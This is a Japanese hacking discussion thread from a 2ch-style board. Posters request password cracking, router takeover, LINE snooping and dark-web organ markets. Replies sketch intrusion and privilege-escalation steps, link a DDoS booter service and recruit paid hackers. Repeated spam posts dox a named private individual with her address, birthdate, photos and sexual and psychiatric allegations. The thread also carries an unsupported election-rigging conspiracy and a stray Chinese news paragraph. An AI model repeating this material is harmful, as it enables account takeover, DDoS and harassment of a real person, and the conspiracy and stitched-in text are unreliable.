ハッキングはターゲットを決めてやることもあればIPを順々にまわってぶち抜けそうなところを見つけてやる場もあるでしょう >>461
有名税ですね、ありがとうございます
問題はプロバになんらかの変更相談やプロバ自体の変更をした方がいいのかですが
ターゲットを決めるとはネットの痕跡からかリアルの情報からかのどちらでしょうか? ああ失礼、IPの問題だけで他をどうしようがネッで同じ行動をしてれば関係ねーって事でしたかね
すんませんでした >>453
上のやつ在庫切れになってるけど人気あんの?
この二冊読んだ人いる? これは空き家の住所に送らせるとかしたほうが良かったんでね?
不正取得した日本Amazonのギフト券はヤフオクで売って犯罪用口座に入金させるという手口を悪徳業者がやってるけど、犯罪用口座を持つのもリスクがあるし。
Torで約814万のギフトカードを注文し窃盗、期間雇用社員の我那覇響容疑者(26)を逮捕
http://h itomi.2ch.net/test/read.cgi/poverty/1460090377/
http://www.sankei.com/west/print/160408/wst1604080002-c.html
2016.4.8 11:30
【衝撃事件の核心】偽名はアイドルマスターのキャラ「我那覇響」 自ら注文したゆうパック、郵便局で抜き取る…崩れた完全犯罪
郵便局内で配達予定のゆうパックを盗んだとして、京都府警下京署が窃盗の疑いで京都市南区の日本郵便期間雇用社員、笠井和樹容疑者(26)を逮捕、
3月下旬に起訴された。笠井被告は、人気ゲーム「THE IDOLM@STER(アイドルマスター)」のキャラクター「我那覇響(がなはひびき)」などを含む10以上の偽名を名乗り、匿名化ソフト「Tor(トーア)」を利用して、
大手通販サイトでギフト券など約814万円分をゆうパックの代金引換で注文。到着時間など郵便局の内情を把握する立場を悪用し、郵便局に届いたゆうパックを窃取する犯行を繰り返した。
完全犯罪≠フ目論見はすぐに露見し、あえなく御用となった。
【IT】アダルトグッズもハッキングの対象に あらゆるものにサイバーリスクの高まり、専門家が警告 [無断転載禁止]・2ch.net
http://potato.2ch.net/test/read.cgi/bizplus/1459055679/ 👀
Rock54: Caution(BBR-MD5:9b22c7f4230cc00c6a64867c4f807ee4) 少し前に出た「フューチャークライム」という本がよかった
とにかくいろんなサイバー犯罪が紹介されてて参考になった nmapはシステムの検地に引っ掛かるし下調べには古いね 特定サイトを自動でスクレイピングをやりたいのですが、
そのサイトには、自動でスクレイピングをやってるな、とは思われたくありません。
「IEでアクセスしてるな」と思われたいです。
この場合、どんな言語で、どんなプログラムをすればいいのか書いてある本はあるでしょうか? スクリプト言語のソケット通信で、HTTPヘッダについて調べたらいい >>473
UA偽装しろ
そもそもIEでアクセスしてるからといって自動でスクレイピングしてないな。なんて思わせられんよ
やるなら許可やってからのほうがいいね。 もっとPython3の利用率上がらねーかな
print "hello"
とかみるとムズムズする >>477
その表記はPython3.xではNG
Python2.xはOK >>480
クラッカーと誤認しているなら黙ってろよ無能 さっきいきなり「showmyPCの実行を許可しますか?」というダイアログが出てきたので
キャンセルしてやったのだけど、こんなリモート遠隔ソフトはインスコした覚えがさっぱり無い
もしかしたら他の人の所でも今日から似たような事が起こるかもしれんので
もし見かけたら許可しないようした方がいいかも デフコンとかmac使いが多いような気がする。窓sでも良くね 面倒だからKali Linux常用してる
客出しOfficeドキュメント作成とネットワーク図引く時のvisioだけがネイティブ移行できてない
ms Officeはよ滅べ ヘルプです(TT)
テキストリーム掲示板で個人攻撃がされています。
http://textream.yahoo.co.jp/message/552022850/bd6f7bc16b406dda48cbf03b80fb888a
犯人は「表示名:urjどっと混む」=「Yahoo! ID/ニックネーム:urjlkdfsa」です。
http://textream.yahoo.co.jp/personal/history/comment?user=9R9XLDphpivBUGSiDWo-
現状のままではスレッド利用者としてとても悲しいので、黙らせようと調べましたが、
YahooのIDが表に出てていないため情報が全く掴めません。
どなたか、「表示名:urjどっと混む」=「Yahoo! ID/ニックネーム:urjlkdfsa」を黙らせる方法をご教示いただけませんでしょうか?
何卒何卒お助け下さいm(__)m マ イ ン ド コ ン ト ロ ー ル の手法
・沢山の人が、偏った意見を一貫して支持する
偏った意見でも、集団の中でその意見が信じられていれば、自分の考え方は間違っているのか、等と思わせる手法
・不利な質問をさせなくしたり、不利な質問には答えない、スルーする
誰にも質問や反論をさせないことにより、誰もが皆、疑いなど無いんだと信じ込ませる手法
偏った思想や考え方に染まっていたり、常識が通じない人間は、頭が悪いフリをしているカルト工作員の可能性が高い
靖 国 参 拝、皇 族、国 旗 国 歌、神 社 神 道を嫌う カ ル ト
10人に一人は カ ル ト か 外 国 人
「ガ ス ラ イ テ ィ ン グ」 で 検 索 を ! 2015年4月に行われた統一地方選で堺市から自民党の公認で出馬し、大阪維新 の会の候補に僅差で落選した
候補が不正選挙を告発する行政訴訟を起こしており、その過程で不正選挙があるとすればそれがどのような方法で
行われているの か、全貌が明らかになった。
以下の証言は絶対に見るべきだ。7月9日のインタビューだ。https://t.co/bdnvz5D68N発言のポイントをまとめると
以下のようになる。集計装置の「ムサシ」の操作よりもはるかの手の込んだ方法だ。
1)「ムサシ」が集計した票の結果は各自治体の持つ選挙サーバにアップされ、その結果が選挙速報として反映される。
2)選挙サーバは2つある。期日前投票のサーバと開票結果のサーバである。
3)この2つのサーバとも設計時からバックドアが設けてあり、外部から侵入して得票結果を操作できるようになっている。
4)大阪府議選における堺市の得票結果に疑問を持ったので堺市に調査をしてもらったところ、選挙サーバにリモートでアクセスしている事実を担当者が白状した。
以上である。もしこれが事実であれば、今回の参議院選挙で同じ手法が用いられた可能性は否定できないはずだ。
http://ytaka2011.blog105.f c2.com/blog-entry-580.html 寂れた街頭
http://133.130.123.140/board
(´・ω・`)ハッキングできるならしてみろ >>489
違反報告すればそれで済むんじゃない?
一人では無理でも大勢が違反報告すればアカウント停止になるはずだよ。
そういう下らない人間は何言っても堪えないからアカウント停止が一番堪えるよ。 数年前読んだサイトで、某国(ロシアだったかな?)のハッカーが、違法サイトに広告貼り付けて巨額の利益を得ていたという内容の日本語のwebサイトがあったのだが、削除されたのか、今検索しても見つからない
誰か心当たりがあれば教えてほしい 質問
ターゲットはポートに穴のあるルーター。ターゲットのipアドレスはわかってる。
開いてるポートもスキャンした。
そこから先、ルーターのrootを取ってファームウェアを書き換えたり挙動を変更する方法を教えて。 誰か、サイバーセキュリティテスト完全ガイド読んでる人いない?
俺にはちょっと、レベル高い書籍だわ ハッカーの学校ですら俺にはレベル高い
あれ覚えなきゃ話にならんよな ヤクザになるのに努力はいらないのと同じだよ
そいつは最初から才能があるからそういう奴なんだ あるwordpressで作られたページのパスワードで保護された会員用ページをどうしても見たい。
別に垢を乗っ取りたいわけでないのに、wordpressのハッキング関係で検索すると垢を乗っ取る話ばかり。
会員用ページを見る良い方法って何かないかな?IDはなくてパスワードだけ。 >>507
ありがとう
SQLインジェクション? wordpressはコアセキュリティで防いでるという記述を見たけど。。。できるのかしら wordpressに有効なSQLインジェクションがあったら大問題なわけだが...
つーかここできいちゃうような情弱には無理 .
寒くなるとわたし土井莉里子はヘラって男の人なら誰でもよくなります
緊縛ハメ撮りで有名な相馬おじさんと二人でラブホに行って服を全部脱いで
裸を見てもらいながら縛ってもらったりエッチなことをしながら写真を撮ってもらいます
https://pbs.twimg.com/media/CpFjMz0UEAAurD-.jpg http://i.imgur.com/krIsXuT.jpg http://i.imgur.com/LSeZ27T.jpg
釣りニコ生主のコジコジさんと沖縄旅行に行ってオフパコしたのは冬です
バンドマンののこさんと内緒ではじめて会って当日にセックスしたのは今年の夏6月です(衝動とミーハー心でした)
粘着と依存してるのは何回もパコってるしまだ人気者だし (私が男性依存症とかセックス依存症だから) です
この夏は3人の男の人と皆に内緒で会いました(エッチは2人です) 密会とかイケナイ事するのが興奮するんです
刺激がないと生きていけない http://imgur.com/a/S3zdd (少年Aさんとも仲良し) BL変態好きで彼女もいました
三鷹か吉祥寺で見かけたらナンパしてください 寂しいの・・・男の人を見ると性衝動が抑えられません。。
文学ガール演じてますが 実際は精神荒廃した ただのアバズレチン子です ハッキング得意です ■Twitterアカ
短歌のbot @tankano_bot
ひとひら言葉帳 @kotobamemo_bot
夜空の短歌bot @yozoratanka_bot
言葉帳bot @kotobacyo_bot
萌葱@怪 @monster_phones
美しい言葉 @beautifulkotoba
言葉に癒されたい @kotoba_iyasaret
@riricoco0
@bibliophilia333
@muzimuzi333
@nekomatagensou
@hanasoraumimori
@mirainosekai3
@zibanyan666
@parlorchild
@liliririko
@EriotN
@mike_peko
@riricoco0
@ririko_neko
@nyanpas ※1
@telegraphyneko
・
・
以下略 ハッカーの学校の新作買った人、感想教えてください。 >>515
>ハッカーの学校
新作ってこれのこと言ってんの?
ttp://s-akademeia.sakura.ne.jp/main/books/school/contents.html
(sakuraの全角aは小文字にする) >>516
ttp://s-akademeia.skura.ne.jp/main/books/lock/
こっちの方です。 >>518
ありがとうございます。
参考になります。
興味があるので買ってみることにしました。 指定したサイトにddosしてくれるんだって
https://booter.xyz/ 仮想でCentOSを導入して自宅鯖建てて攻撃って意味ありますか…?
全くの素人なのでCentOSインスコする時にメールサーバーやFTPサーバーなどの項目が出てきて困ってます。
詰まるところ、どのサーバーをインスコすれば良いのやら…。 >>521
なにを攻撃したいのかによる。
メールサーバー攻撃したいならメールサービスは動かすべき。
とりあえず「攻撃したいサーバーを作れ」としか・・・ 攻撃って具体的にどういう事を勉強してどういう所を突くのかが分からない >>524
それを知るために>>521は勉強するんだろう >>525
自分もFTPサーバ立ててみたんだがどう攻撃すればいいのか分からん
取り敢えずツール使ってみるか >>526
アプローチとしては間違ってない。
とりあえずはネットワークから叩けるツールを作る。
RFC 959読んで、どんなプロトコルで操作するのか理解する。
どんなコマンドがあるのかIANAとかで調べる。
FTPの実装のソースがあれば読んで理解する。
あとは弱いところを叩けばいいだけ。 >>527
弱い所を叩くというのがよく分からんのだがこれは勉強していくうちに理解するものなのか? >>528
「理解するために勉強する」と思ってもらえればいい。 本気でハッカーになりたいなら、まずはネットワークからかな? ネットワーク セキュリティなら、
CCIE SecurityとかCISSPあたりの大型ボスがいるから資格で知識を試せるよ 初心者が勉強も兼ねながら効率よく順番に取得するならどんなコースがオススメ?
できればおいおい士業に憧れあるからRISSも取得して登録したいんだけど、出来ればまずは理論と実践は車の両輪的なコースでいきたい
そうすれば自ずとRISSになれる力も身についてるだろうし 英語, 数学, 物理の勉強して日本から脱出するのが先ってのを
先人たちが築き上げた日本IT社畜歴史から学んだ方がよいと思うよ もうアラフォーのオッサンだから今更そんなことやっても意味がないんだ 1回過去問解いて合格水準に満たなければ勉強する価値はあるんじゃね パケットジェネレータについて教えて下さい。
仕事で基盤関連の部署になり、
勉強目的で以下条件を満たすパケット自動生成ツールを探しています。
@Windows環境で動作する
ACUI/CLI型(コマンドで実行)
BHTTPのリクエストを文字列感覚で自由に指定出来る
C第3層ネットワーク層までのヘッダ/データを自由に指定が出来る (例)宛先IPを指定する
以下にwikiの一覧があります。
https://ja.wikipedia.org/wiki/%E3%83%91%E3%82%B1%E3%83%83%E3%83%88%E3%82%B8%E3%82%A7%E3%83%8D%E3%83%AC%E3%83%BC%E3%82%BF
■質問
上記条件を満たすツールと、そのツールのダウンロード先、インストール、使用方法を、
分かる範囲で教えて下さい。
有名どころでは「hping」があるそうですが、windowsでは使えず、
かつ、BのHTTPの箇所(アプリケーションレイヤの指定)が出来なそうです。 >>524
例えばWebの穴を突いてwww-data権限を取れればその時点でシェルが持てる
んで鯖のバージョンやシステムをググってったらlocal exploitなんかがあったりしてそこから権限昇格してrootを取れたりする
まああれよ、自分でサーバ借りるなりしてガバガバなPHPでも置いてみると良いかもよ
放置しとけばアクセスログに大量の攻撃ログが降ってくると思うから、それで勉強になると思われるよ やっぱうそ
それじゃ勉強にならない
でもインターネットって広いからさ、本当に山ほど情報があるんだよ。
それを知ってしまえばここで質問する意味は果たしてあるのか考えを改めると思われるよ。フホホ 私は元創価の会員でした。
すぐ隣に防衛省の背広組の官舎があるのですが、
自分の家の窓にUSB接続のwebカメラを貼り付けて、そこの動画を撮影し続け、
学会本部に送っていました。
別に大したものは写っていません。ゴミだしとか奥さんが子供を遊ばせている所とか。
官舎が老朽化し使われなくなってから、
今まで法人税(うちは自営業です)をほぼ払わなくても済んでいたのが、
もう守ってやれないのでこれからは満額申告するように言われました。
納得がいかないと言うと、君は自業自得で餓鬼地獄に落ちる、
朝夕南無妙法蓮華経と三千回ずつ唱え上げて心をきれいにしなさいと言われ
馬鹿らしくなって脱会しました。
それ以来、どこへ行くにもぞろ目ナンバーの車につけまわされたり大変な日々です。
全ては自分の出来心から起きた事で、どこに訴えて出ると言う訳にもいかないのですが、
なんとかあの人たちと縁を切った上で新しい始まりを迎える方法はないんだろうか。 IPヘッダの送信元ローカルIPをいじった状態でインターネット先のサーバーに送信した場合、自分のグローバルIPはバレるのですか? >>542
o 。 ______o O 。 。 °
。 ○ o ○ / ィ ○ o ○
o /ニニニ)⌒ヽ
o (@∀@-)__ ) よい子のみんな!
○ 。 ○ / φカルト○) / 聖教新聞を届けるよ!盗聴器も一人一台あるからね!
。 o o ∠ (/)-( /)_/ /
o .|/ ̄ ̄ /_|/ ○ 。 o O 。
o O /∩ ̄ ̄/∩ o 。
。 ノ / o O
o o ψ ψ_ ノ)ψ ψ_ノ) 。 o ○
o (@∀@-) (@∀@-) つ o ° o 。
。 o ∪-∪'"~ ∪-∪'"~ 。 。 o °o 。
__ _ 。 __ _ o o__ _ °
__ .|ロロ|/ \ ____..|ロロ|/ \ __ |ロロ| __. / \
_|田|_|ロロ|_| ロロ|_|田|.|ロロ|_| ロロ|_|田|.|ロロ|_|田|._| ロロ|_ ISPが客側に払い出してるグローバルIPアドレスのレンジでフィルタしたら
出入り口で偽装されたパケットはドロップされると思うけど 匿名のWi-Fiとパソコンはこちらで用意しますので、作業だけやってくれる方いませんか?
副業でも結構です。在宅作業なので地域は問いません。
収入は保証します。 興味ありましたらご連絡ください。
sh4d3あっとneko2ドットnet 犯罪者の仲間募集を、こんなところでしないでください ハッキングできる人月100で依頼受けてくれませんか ハッカージャパンみたいな雑誌は他にないのでしょうか?
ハッキングの達人は持ってますが情報が古くて。
みんな、webで情報得てるんですか? NW屋だからCiscoPressのSecurity系の本を読んでる
Router, Switch, FW, IPS/IDSとかのNW機器寄りだから
サーバ上で動いてるサービス系の脆弱性とかまでには対応出来ないけど ここのところ写真撮って短文書くことにしかネット使ってなかったから
何年振りかにネットワーク関係やろうかなと >>558
キディレベルでプログラミング基礎出来るならyoutubeで調べるとええぞ
プログラミング出来なくてもソフトの扱いさえ出来ればええんやけどな
英語でも動画だから分かりやすいぞ 前々から欲しかった実践Metasploitをやった買ったわ
実践ネットワークセキュリティも欲しいけど電子版無いのが残念 .
.
東京都三鷹市 元ニコ生主の莉里子です (整形後) http://i.imgur.com/SLcz3dS.jpg (整形前) http://i.imgur.com/zPvxpx5.png
不倫・浮気・密会・不道徳な行為は著名な小説家でしている人がいるので真似しちゃう池沼です http://i.imgur.com/vZeIuO3.png
■2015年2月 釣りニコ生主コジコジと沖縄旅行でオフパコ
2015年2月2日-3日...釣り生主コジコジと沖縄旅行でセックス/やり捨てされ逆ギレ
2015年2月4日.........莉里子の父親から電話があって脅されたとコジコジに放送で暴露される
2015年2月6日.........リスカ画像UP
2015年2月9日.........ツイ全消し/コミュ爆破逃亡
http://imgur.com/a/58WQC
■2016年6月 バンドマン兼ニコ生ツイキャス配信者と密会 その3日後に穴るセックス〜継続中
http://imgur.com/a/Lx8o2
●早川莉里子●土井莉里子●土井寧々●土井剛●早川剛●星崎●りりこ●りりこし●にゃんぱす
●ね子●にゃこ●みんち●めう●ねね●猫又●剛
※名古屋ゲイ風俗ホストとも体の関係※ >>566
お前はそういう知識について知り尽くしてるのかよ 私が私でありえずに
堀尾さんが帰り道に溺れるとき
その不束な優しさが
刺さったままの棘でした yahoo id 『ecirtca88』
ecirtca88@yahoo.co.jp
パスワードを調べて欲しいです。 このアドレスの奴に携帯ハッキングされて人生めちゃくちゃにされました。
パスワードわかった方にはお礼はします。 サカナクションのサイトがハッキングされたけどあれっと相当技術いるでしょ、まだ捕まってないみたいだし 近日,数学科学学院2015级和2016级科学学位研究生党支部分别召开专题组织生活会,
学习“两会”精神。2015级科学学位研究生党支部学习了国务院政府报告主要内容和
“两会”舆论热点,2016级科学学位研究生党支部讨论了“两会”在国家运作中的作
用和对日常生活的影响。党员们既关秋月康秀注国务院政府报告中关于国民经济状况
的总结和2017年政府工作重点的宏观层面,也探讨了教育部部长陈宝生关于“双一流”
建设、大学生创业资助和提高博士生国家助学金的讲话,讨论了房地产调控、延迟退
休、取消漫游费等社会热点话题。与会党员同学提出,复旦大学作为国内一流大学,
数学学科作为国内一流学科,在争创“双一流”的建设中需要研究生们认真学习、刻
苦钻研;党员同学们建议,环境保护可以结合党支部的“快乐星期五”志愿服务活动,
网时代,应充分利用信息技术打破时空限制,引进先进教学内容,通过网络平台实现
资源共享。党支部书记指出,研究生党支部的党员同学要将校风学风建设与“两学一
做”学习相结合,既要传承复旦大学良好学风,也要将其发扬光大,体现党员模范带
头作用。 >>571
メールアドレスのパスワードなんか調べてどうするんですか?
そんなもの調べても仕返しもできないし、あなたの人生も帰ってきませんよ。。 .
.
東京都三鷹市下連雀(吉祥寺) 元ニコ生主の莉里子 https://i.imgur.com/XYIO6ri.png
シティハイツ吉祥寺通り4階【猟奇的なオカマ】おちんちん有
莉里子=少年A=剛=コピーライティング=ハッキング常習犯
@shounen_a_ @copy__wrinting
【検証画像】 https://imgur.com/a/qAea6
【誕生日をコロコロ変える】
1995年5月17日(少年A) http://imgur.com/a/2uDBc
1996年4月25日(にゃんぱす) https://imgur.com/a/oJZpv
1994年3月7日(莉里子/りりこし) ニコ生で本人が申告
【ニコ生配信中の様子】 https://imgur.com/a/TXEgU
【少年A出演映画/少女の王国】 https://imgur.com/a/002N5
【彼女がいたとレズアピール 実は男でホモ彼氏とセフレがいた!】
最初の頃みたいにもう布越しじゃ我慢できなくなってパンツの中に手入れてきたりしないのかな...
奉仕してるときに頭撫でてくれないのかな...終わって寝てるときにいきなりムラムラして自ら誘ってこないのかな...
ちんぽっぽ http://imgur.com/a/8LCNm
【亀甲縛りに猿ぐつわ/麻薬/自己陶酔/乱れた性生活】 https://imgur.com/a/BHqSV
よしよしよし、寝ちゃえ!そいつらは私が掘っとくから 自称変態に「じゃあヤらせろよ」って言ったら泣いた
デビューシングル「おとこおかす」少年A feat.てけー https://goo.gl/F7hPF0
これは嫌だなー。。本当だったら落ち込むわー。。 何このスレw
metasploit語ってる人数人しかいないw 誰かボタン一つでどんなサーバーにも入れるソフト作れや youtubeのアカウント停止されたんだけどハッキングして停止を解除することってできるの?
もしくは動画だけでも回収とか クラックキングで改竄されたページに生IPでアクセスしたら逮捕されたりするん? クラックした本人だと警察に疑われてそのまま誤認逮捕されちゃうのかなって ペンタゴンパッキングするやつや過去にしたことあるやつマジ英雄 >>593
無いよ。
まず改竄される前は普通のホームページな訳で
一般ユーザもアクセスするから。
それに逮捕に関してはそんな簡単に
できるものじゃないんだよ。
長い時間かけて客観的な犯罪事実を集めないといけない。 >>593>>600
逮捕されるぞ
クラッキングされてXSRF仕掛けた掲示板を踏んだ奴が爆破予告か殺害予告を勝手に書き込まれて捕まってる
誤認逮捕ってことになったが大学を退学になってたし
全く調査せずに自白強要して誤認逮捕した警察は謝罪も無しで更に捜査妨害扱いだからな >>601
明治大学だっけ?
あの時はひどいと思ったw
復学もないしw
ふつうは訴訟ものだろw お前ら、アノニマスとか興味ないの?
anonopsで検索したら、奴らのコミュというかたまり場見つかるよ >>601
確かにXSRFみたいな悪質なスクリプトが
組み込まれて無いとは限らないな。
可能性としてはあるけれど
それが目的ならHackedとか書いたりしないかな。
攻撃コード埋め込むだけで最小限に留めるはずだし
改竄されたサイトの中でも、敢えて目立つようにしてるものは
目立つ事自体が目的だから可能性としては低い。 >>603
今のanonymousはbotnet買ってddosやってるだけだしなぁ
deepdotwebとかthe hidden wikiからサイト巡りして情報集めるかyoutubeでクラッキング実演してる動画見た方がスキル付く
表のフォーラムで聞いても2chみたいにはぐらかすスキルの無い奴が集まってるだけじゃん
まだブラックマーケットのフォーラムでROMってるほうが無能少ない分マシかな そこまでの知識がないから2chで低い知識の共有をしてるやで
わいも貴殿のようにちしきつけたいなぁ〜 てかまだ警察ってipを証拠にしてんの?
ipだけじゃ弱いのわかってるだろ 超抽象的にあこがれて勉強してるけど
スキルセット多すぎて辛い
正直webサーバーのフレームワークとかの脆弱性ってのもなんかテンション上がらない
だれかぞくぞくするよーなハック対象おしえて やっぱりBlouetoothとかを対象に実験してみるのがおもしろいんかなぁ やっぱりBlouetoothとかを対象に実験してみるのがおもしろいんかなぁ やあみなさん、 私は相変わらず元気ですよ
いつもどおり、ハッカーにはなれずショッカーのままですが
みなさんもショッカー目指して頑張りましょう 応援してますよ
キチガイショッカーより 試しにワイのTwitter乗っ取ってみろや
@oni_pokemonやで お金がないのでiPhone4sを2480円で購入して使おうかと考えています。
脱獄すれば速度的にはサクサク動きそうなのでいいのですが、セキュリティー的にどのくらいやばいですか?
自宅のルーター環境の元でWi-Fi接続するぐらいならばウィルス感染の心配はないのでしょうか?
ニコ動のWindows2000のルーター無、全ポート開放でネットつないだら1分でウィルスに感染したという動画をみたのですが、
ネット上につないだ時点であらゆるポートスキャンは常にかけられて脆弱性を探しているプログラムがたくさんあるのでしょうか? >>615
ウイルスもカーネルレベルで動かすことができるようになるからiphone上だけでは削除不可な状態に陥る
メーカーの保証も改造で無くなるから一度感染すると素人には修復不可能
詳しい奴なら自分で修復も可能だが、お前みたいな無知では一回感染したら捨てる以外に無いというだけだ ウィルシに感染したかどうかチェックするのはタスクマネージャー的なので動作チェックして重くなってねーかとかチェックすんですか?
そんでさくじょするの? >>616
捨てるだけで済んだら御の字だけどな。。。
この手のたぐいは更に金銭的な被害や刑事的、社会的な損失が出るのが普通。 クレカはスキミングとか詐欺なら保証してくれるけど、他のサービスは保証なんかないから犯人捕まえて賠償請求するしかない
俺ならウイルス仕込む方法じゃ取れる金額知れてるし、コスパ悪いからウイルス仕込んで金盗んだりはやらないな
ウイルス仕込むなら直接金盗むよりマイニングのほうがバレにくくて確実に稼げるし
金盗むならSIMごと乗っ取る方法のほうがコスパいい >>615
脱獄すると早くなる方法を教えて下さい。
私はテザリングの為だけに脱獄してます。 Wi-FiのLINE通話かディスコード通話からIP抜く方法教えてください
Windowsです >>623
同じwifiに入ってプロミスキャスモードでパケットキャプチャ >>622
最新のiOSにうpしなければいいんじゃないの? htmlでもうデータは上がってるけど期日まではさらされないページ見る方法しりたい 私たち日本人の、日本国憲法を改正しましょう。
総ム省の、『憲法改正國民投票法』、でググって
みてください。拡散も含め、お願い致します。 中国の
臓器売買もしている
ダークウェブのマーケットプレイスが知りたいです。
誰かURLを教えて頂けないでしょうか?
いくら暗网で探しても出てこなくて。
Torブラウザを使うことは知っています。 この間、lineがハッキングされ仕事情報のスクショを取られ情報を抜き取られてしまいました
相手はエンジニアを半年程度やってる人間なんですが
LINEのハッキングってそんな簡単にできるものなんでしょうか?
教えていただきたいです
おそらくログイン情報は電話番号いがいは相手は知らないです 同じwifiに入っているアンドロイドからのラインのメッセージのやりとりを
ハッキングして盗み見する方法ってありますか? この間、lineがハッキングされ仕事情報のスクショを取られ情報を抜き取られてしまいました
相手はエンジニアを半年程度やってる人間なんですが
LINEのハッキングってそんな簡単にできるものなんでしょうか?
教えていただきたいです
おそらくログイン情報は電話番号いがいは相手は知らないです ふざけたヤツだ。
人が愛用しているミラーサーバーにメンテと称して工作員がのこのこ出向いて、exploit codeを紛れ込ましてroot権限を乗っ取るwww
アップデート状況やら、落としたアプリやら覗き見して、オープンソースが善意で成り立っている?
ふざけるなwww
大学に圧力でもかけたのか?
お前らがメンテしているようなサーバー誰が信用するかいw
言っとくが、SUID&SGIDの中身や各ユーザー毎のバイナリのハッシュの初期値のバックアップ取ってるぞw
どこがどう変更改竄されているか直ぐ判明するからな。
これから、こちこちと詳らかにしていきたいと思うとる。
1mmでも改竄があれば直ぐに判明するw
それと、ペネストレーション用に使おうとしていたnmapにbackdoor混入させるのか?
インチキソースでおびき寄せてハックらかw
logビュワーがlockされたらおかしいと思うのか普通だよな。
それと、以前の話しだが、netstat叩いたら、なんでリモートホストが192.168になっとるのか?
これって、仮想HUB経由しないで、ルーター経由で侵入を試みたということだなw
あるいは、一部のルーターで、VPN実装しているような機種でやったのか?
あまり、いちびった真似するなよw 今現在beef-xssなるものをやっているのですが、
サーバーになぜか接続できなくて困っています。
internal server errorとでてきてしまって繋がりません。
アンインストールしてインストールしてアップアップデートして
バンドラーインストールしてそれでもつながりません。
URLもlocalhost:3000/hook.jsなんですが繋がりません。
ui/panelの方は繋がりますがパスワードが合いません。
どこかのcoolな方教えて頂けないでしょうか? 早い話が、まともに侵入したらバレるので、クロスサイトスプリング攻撃でウィルスに感染させるつもりだな。
3000番portに脆弱性でもあるのか?
ウィルスであれ、ハックらであれ、絶対に無理だと思うわ。
俺のOSの全システムにはSE linuxのポリシーが適応されている。
アプリケーションには、apparmorが適応されている。
1mmでもアクセスがあれば、強制アクセス制御MACが発動する仕組みになっている。
接続すれば、logに出力されるので、どのIPアドレスから何番portにアクセスがあったか直ぐに判明する。
のこのこrootアカウントでsshとかで来るマヌケな真似するなよw
kali linuxを仮想環境で使って、ハックらのシュミレーション推奨しているおバカはお前だけだ(笑) ゴメン、我ながら、これっちょっと無理だと思うわ。
前回の設定より10倍協力にしておいたんよ。
どのデレクトリー、どのファイルにもアクセスできんよ、これは。
たぶん、お前のターミナルには次のように表示されると思うわ。
# そのようなファイルやデレクトリーはありません。
または、
# 許可がありません、てな(笑) >>前回の設定より10倍協力にしておいたんよ。
前回の設定より10倍強力にしておいたんよ。 いや、まあこれねぇ、申し訳ないけど絶対に無理だと思うわ、バッカー君。
まあ、ルーターもガチガチのUTM状態でWAN側からのアクセスは完全に遮蔽状態だわw
OSにアクセスどころか、ルーター超えの段階で無理。
どう転んでも無理だわw
VPNであれ、SSHであれ、暗号化であれ、なんであれ、これ通らんよw スカイプで前使ってたアドレスで登録しててパスワード忘れたんだけどログインしたくてなんかパスわかる方法とかない? ガラケーよりスマホの方がハッキングしやすいというのは本当なんだろうか
だとしたら理由は何なのか >>646
ユーザーにアプリのインストールをさせられるからでしょうな
マーケットで最低100万はするためスマホの脆弱性は殆ど無いようですが
偽広告や偽装メールなどのソーシャルエンジニアリングで誘導してアプリをインストールさせることは出来るでしょうな
脆弱性を突いたハッキングの難易度は同じくらい難しいと思われますがアプリのインストールのしやすさが違いますな OrbotのVPNモードってVPN→TORなのですか?
これで対象にVPNアプリ選んだら自然とdoble vpnになる? OrbotのVPNモードってVPN→TORなのですか?
これで対象にVPNアプリ選んだら自然とdoble vpnになる? VPNモードは全通信をTOR経由にすると言う事ですな
Proxy設定が出来ないアプリもTOR経由にする事が出来るのですぞ https://www.cyberghostvpn.com/ja_JP/
PenTest系の本にツール紹介でこれ載ってたんだが
TORあるし使ってる人の情報少ないな
企業が提供してるサービスだから速度は安定しそうだけど >>651
IP確認しながらやっと分かりました
Orbotのvpnモードでvpnアプリが選択でき、開くと画面上両方走ってる様に見えるので疑問でしたが
Orbotからvpnアプリ開いてもただvpnアプリ開いてるのと変わらないんすねやっぱ
それならOrbot→ブラウザでいい。となると、匿名VPNの存在価値が??…… >>648
ふむ、ハッキング用のアプリをインストールしなければハッキングしやすさはガラケーと変わらないという事? >>654
独自性と汎用性の違いですな
汎用性の高いスマホの方が脆弱性が見つかった時の被害が大きいと言えますな
しかし、ガラケーは独自仕様があるため脆弱性が多くともハッキング出来る数が少ないので労力に見合わないと考えるでしょうな
ハッキングのしやすさで言えばガラケーでしょうが各社の独自仕様や開発環境の手に入れにくさを考えれば一長一短と言うところでしょうな ブロックチェーンをハッキングする技術を応用すれば、国の借金が返せそう。 Wiresharkに書いてあることがわかるようになってきた ^^
うれしい ^^ 昔はNmap Script Engineのvulnスクリプトを動かすだけで脆弱性がゴロゴロ見つかったけど、最近は高性能な脆弱性スキャナを使ったとしてもslowlorisに対する脆弱性ぐらいしか見つからないから、Social Engineering系でないとなかなか難しい これ凄いなと思った。
何が凄いかというとwindows10のパスワード無しでwindowsにログインできてしまう。
https://gigazine.net/news/20200314-chntpw/
UBSメモリにlinuxをインストールする必要がるからちょっと面倒くさいが。 みたかのりりこってやつ 全部漢字で検索してみ みたか の 莉 さと 子 ストーカー
https://i.imgur.com/z53SrpC.png
君がかわいい男の子ならお小遣いまでくれるかもよ >>1
東京三鷹の土井(剛)莉里子
https://i.imgur.com/xuVI2S5.png
氏名■土井剛(莉里子)
生年月日■1994.3.7
前住所■〒181-0013 東京都三鷹市下連雀5丁目3 シティハイツ吉祥寺通り4階
性別■男(詐欺師のため、戸籍変更している可能性あり)
Twitter■@copy__writing @kotobamemo_bot
疾患■性同一性障害(LGBT)、発達障害(ADHD)、アスペルガー症候群、統合失調症
●一方的に好意を寄せる男性から相手にされないと嫌がらせを繰り返す
●某大学病院の精神科隔離病棟にて強制入院
●骨が見えるほどのリストカット
●奇声をあげながら自室部屋のドアをナイフで突き刺す
●シティハイツ吉祥寺通り4階から飛び降り自殺
●性転換手術(金玉を取る)
●トラブル...嫌がらせ、ハッキング、乗っ取り、たかり、脅迫、殺害予告...etc
●去年から今年にかけてyoutuber同士のトラブルの仲介に入り某大手youtuberから複数回に渡り1億近い慰謝料をふんだくる
●自宅の吉祥寺にいられなくなり、大阪に潜伏中(警察からも逃げている) 頼みがあります。atlas forex(urlが貼れないのですいません。検索するとすぐに出てくるとおもいます) この自称海外FX会社の事で調べられる事があれば調べて貰えません?
出金拒否のトラブルが多発していて被害者が相当数でています。 取り返す事は諦めているのですが、どんな相手に騙されたか知りたいです 現在わかっている事
atlas forexがあるレンタルサーバー上には、サイトの作りが酷似している複数の海外FXブローカーサイトがある。
https://web.brionac-yu-yake.net/same-server/result/173-247-224-136.html
